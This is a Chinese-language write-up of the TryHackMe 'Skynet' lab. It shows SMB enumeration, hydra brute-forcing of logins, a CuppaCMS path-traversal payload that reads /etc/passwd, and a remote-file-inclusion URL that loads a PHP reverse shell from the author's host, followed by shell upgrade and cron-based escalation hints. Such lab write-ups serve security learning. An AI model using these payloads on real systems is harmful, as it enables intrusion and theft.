首页 > 其他分享 >THM-Skynet(天网)

THM-Skynet(天网)

时间:2023-03-30 20:33:52浏览次数:56  
标签:46.75 .. log1 天网 milesdyson 密码 THM Skynet txt

侦查

对靶机进行端口扫描

开放有445\文件共享服务,使用nmap枚举该服务共享的文件夹

nmap --script=smb-enum-users,smb-enum-shares -p445 10.10.46.75

枚举出两个重要的目录anonymous、milesdyson

也可以使用smbclient -L //10.10.46.75该命令进行枚举

访问anonymous任何人都可以访问的目录

smbclient //10.10.46.75/anonymous

发现含有attention.txtlogs目录,其中logs目录中有log1.txt、log2.txt、log3.txt,其中只有log1.txt中有内容,我们将其下载

attention.txt内容

A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

log1.txt内容

log1.txt猜测应该是给我们提供的用户名或者密码的字典,翻译attention.txt内容

提示我们上一次的事故中所有人的密码被修改了,log1.txt应该是每个用户被修改的密码,提示我们登录后修改密码,应该这个意思

使用smb枚举得到的用户名milesdyson,使用密码字典爆破ssh服务

hydra -l milesdyson -P log1.txt 10.10.46.75 ssh

遗憾的是并没有爆破出密码

同样的道理,不过这次爆破smb服务

hydra -l milesdyson -P log1.txt 10.10.46.75 smb

同样的遗憾,并没有爆破成功,那么我们需要另找出路了

靶机还开放着80\Web,尝试或者一些有用的信息

查看源代码

action=#所以无论我们如何搜索也无法提交,尝试访问一些敏感的目录和文件

robots.txt

获取目标的中间件信息,以及操作系统

admin目录

提示Forbidden,不允许我们访问该目录

那么我们只剩下最后一种方法,将目录枚举出来

使用gobusterWeb服务进行枚举

gobuster dir -u http://10.10.46.75 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e

扫描过程中爆出了/squirrelmail的页面,访问查看

这是一个登录页面,尝试弱用户名密码admin:admin登录

并没有成功,仔细想一想,刚刚log1.txt密码和用户名milesdyson说不定是在这里用的

尝试使用hydra爆破,获取登录表单传值

获取登录失败页面会返回的字符串,Unknown user or password incorrect

开始爆破


成功爆破出密码为cyborg007haloterminator

登录

登录后可以看到一些邮件,后面两个都是一些没用的信息,第一个邮件内容如下

至于什么意思,我也看不懂,看是身为一个学习网路安全的password这么显眼的单词我是看到了

翻译后

紧接着上面的提示,更改的密码发到了用户的邮箱里,看来上面我们猜测的log1.txt内容为被修改的密码是不对的,这个才是

使用密码)s{A&2Z=F^n_E.B\``登录用户milesdyson`共享的文件夹

smbclient //10.10.46.75/milesdyson -U milesdyson

这里密码还是手动输入比较好,我复制一直没有成功

可以看到其中一些后缀名为.pdf的书籍,其中有一个notes的目录,note(笔记)的意思,这个目录很有可能有我们想要的内容

其中有很多.md的文件,其中有一个important.txt,important(重要)的意思,那么这个文件到底多么重要,我们下载了解便知

重要信息,1. 添加功能到 beta CMS /45kra24zxs28v3yd,添加了一个新的CMS/45kra24zxs28v3yd页面

还要一个次要的信息3.多陪陪老婆,可能是多陪陪老婆的原因,这位先生才忘记更改发放的smb服务的密码,哈哈(胡言乱语ing)

放问/45kra24zxs28v3yd页面

好像并没有什么提示,说是添加了一个新的CMS,????在哪呢?,查看源代码试一试

什么都没有,啊?只有最有一个办法了,那就是对/45kra24zxs28v3yd目录进行扫描

gobuster dir -u http://10.10.46.75/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e

经过一会的扫描,得到了一个administrator目录

访问该目录

是一个名称CuppaCMS,尝试使用弱密码admin:admin或者是admin:123456进行登录,但是并没有成功

使用searchsploit搜索发现拥有远程文件包含漏洞

读取该漏洞的利用文档

文件包含页面为/alerts/alertConfigField.php,需要传入urlConfig的值,该值文件包含的路径

使用提供包含/etc/passwdpayload进行测试

http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

成功包含

现在我们需要使用该漏洞反弹一个shell,修改php-reverse-shell.php,使用netcat进行监听,

开启本机的http.server服务,然后对php-reverse-shell.php进行远程文件包含

http://10.10.46.75/45kra24zxs28v3yd/administrator//alerts/alertConfigField.php?urlConfig=http://10.2.34.252:80/php-reverse-shell.php

成功回弹shell,并且权限时www-data用户

现在我们需要对靶机进行提权

首先我们把终端切换为交换式终端

  1. python -c 'import pty;pty.spawn("/bin/bash")'
  2. export TERM=xterm
  3. CTRL + Z,然后stty raw -echo; fg

成功获取交互式终端

查找SUID文件

find / -perm -04000 -type f 2>/dev/null

没有发现

查找拥有管理员权限的二进制文件

getcap -r / 2>/dev/null

也没有可疑的信息

查看计划任务cat /etc/crontab

发现,系统会以root身份运行/home/milesdyson/backups/backup.sh文件

查看该文件的内容

使用的tar命令进行的备份,在https://gtfobins.github.io/gtfobins/tar/ 找到对应的提权方法

标签:46.75,..,log1,天网,milesdyson,密码,THM,Skynet,txt
From: https://www.cnblogs.com/Junglezt/p/17274149.html

相关文章

  • 【THM】Putting it all together(网站组件协同工作介绍)-学习
    本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/puttingitalltogether本文相关内容:了解Web服务的所有单独组件如何协同工作,这种协同工作能让我们可以访问自......
  • 【THM】How websites work(网站运行基础)-学习
    本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/howwebsiteswork本文相关内容:要对网站进行漏洞利用,你首先需要知道网站是如何被创建的,本文将涉及HTML&JS以及......
  • [Algorithm] Dynamic programming - 01 - Drawing 2-d matrix
    Problem:LevenshteinDistanceWriteafunctionthattakesintwostringsandreturnstheminimumnumberofeditoperationsthatneedtobeperformedonthefir......
  • 【THM】DNS in detail(DNS基础详解)-学习
    本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/dnsindetail本文相关内容:了解DNS协议是如何工作的,以及DNS如何帮助我们访问互联网服务。什么是DNS?DNS指D......
  • THM-Steel Mountain(钢山)
    谁是本月最佳员工?直接访问目标机器,可以看到一个图片,检查得到该图片的名称为BillHarper初始访问使用nmap扫描机器。运行Web服务器的另一个端口是什么?看看另一个......
  • THM-Kenobi(克诺比)
    侦查用nmap扫描机器,打开了多少个端口?枚举共享服务sambaSamba是用于Linux和Unix的标准Windows互操作程序套件。它允许最终用户访问和使用公司内联网或互联网上的......
  • 【THM】Packets & Frames(了解数据包和帧)-学习
    本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/packetsframes本文相关内容:了解数据如何被分成更小的部分并通过网络传输到另一台设备。什么是数据包和帧?......
  • [Algorithm] Disk height (DP + back tracking)
    You'regivenanon-emptyarrayofarrayswhereeachsubarrayholdsthreeintegersandrepresentsadisk.Theseintegersdenoteeachdisk'swidth,depth,......
  • 【THM】OSI Model(OSI模型介绍)-学习
    本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/osimodelzi本文相关内容:了解决定跨网络处理数据的各个阶段的基本网络框架。什么是OSI模型?OSI模型(开放系......
  • 【THM】Pentesting Fundamentals(渗透测试基础介绍)-学习
    本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/pentestingfundamentals本文相关内容:了解渗透测试背后的重要道德规范和方法论。什么是渗透测试?在学习道......